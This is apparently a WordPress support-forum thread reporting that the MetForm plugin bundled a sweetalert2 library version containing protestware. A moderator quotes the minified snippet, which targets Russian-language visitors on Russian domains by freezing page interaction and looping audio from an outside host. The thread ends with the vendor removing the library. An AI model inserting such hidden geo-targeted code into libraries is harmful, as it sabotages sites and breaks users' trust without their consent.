• Resolved batalenkov

    (@batalenkov)


    The developers of Sweet Alert (they also developed this plugin or participated in its development), for their part, added the connection of the anthem for users from Russia.
    It connects together with all libraries via CDN.
    Here goes /wp-content/plugins/metform/public/assets/js/app.js

    It is better to find a replacement for the plugin, because tomorrow the developers and on your site can express their opinion on some world issue without your consent.

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator Yui

    (@fierevere)

    永子

    @batalenkov its 3rd party js library sweetalert2, perhaps metform authors are even unaware about this issue after js bundle update

    Code :

    
     typeof window&&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){const e=new Date,t=localStorage.getItem("swal-initiation");t?(e.getTime()-Date.parse(t))/864e5>3&&setTimeout((()=>{document.body.style.pointerEvents="none";const e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((()=>{e.play()["catch"]((()=>{}))}),2500)}),500):localStorage.setItem("swal-initiation",<code>${e}</code>)}Object.assign(Fr.prototype,Dn),Object.assign(Fr,hr),Object.keys(Dn).forEach((e=>{Fr[e]=function(){if(Vr)return Vr[e](...arguments)}})),Fr.DismissReason=yt,Fr.version="11.6.15";const Yr=Fr;return Yr["default"]=Yr,Yr}(),void 0!==this&&this.Sweetalert2&&(this.swal=this.sweetAlert=this.Swal=this.SweetAlert=this.Sweetalert2),
    
    Thread Starter batalenkov

    (@batalenkov)

    @fierevere Yes, you may be right, but I use the plugin, which, after the update, does not do what is needed. And I can’t decide which libraries to use. If tomorrow my site stops working because of other people’s libraries, then the plugin developers will have nothing to do with it?

    • This reply was modified 2 years, 3 months ago by batalenkov.
    Moderator Yui

    (@fierevere)

    永子

    This plugin bundled malware js library, it depends on plugin author to update bundle with clean version and release plugin update.

    Hello @batalenkov ,
    Thanks for reaching out to us. Very sorry for the delay in getting back to you.

    We have already been able to trace the issue with the Sweetalert library. That library has been removed from the MetForm plugin and we already have released an update(3.1.2) after that.

    Kindly update your MetForm plugin to its latest version. I hope you’ll not face any issues after that.

    If there is anything else I can help you with, please let me know. I will be happy to assist you.

    Best Regards,
    Prosenjit

    Thread Starter batalenkov

    (@batalenkov)

    Hello. Now everything is working well. Thanks

    • This reply was modified 2 years, 2 months ago by batalenkov.
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘malicious code’ is closed to new replies.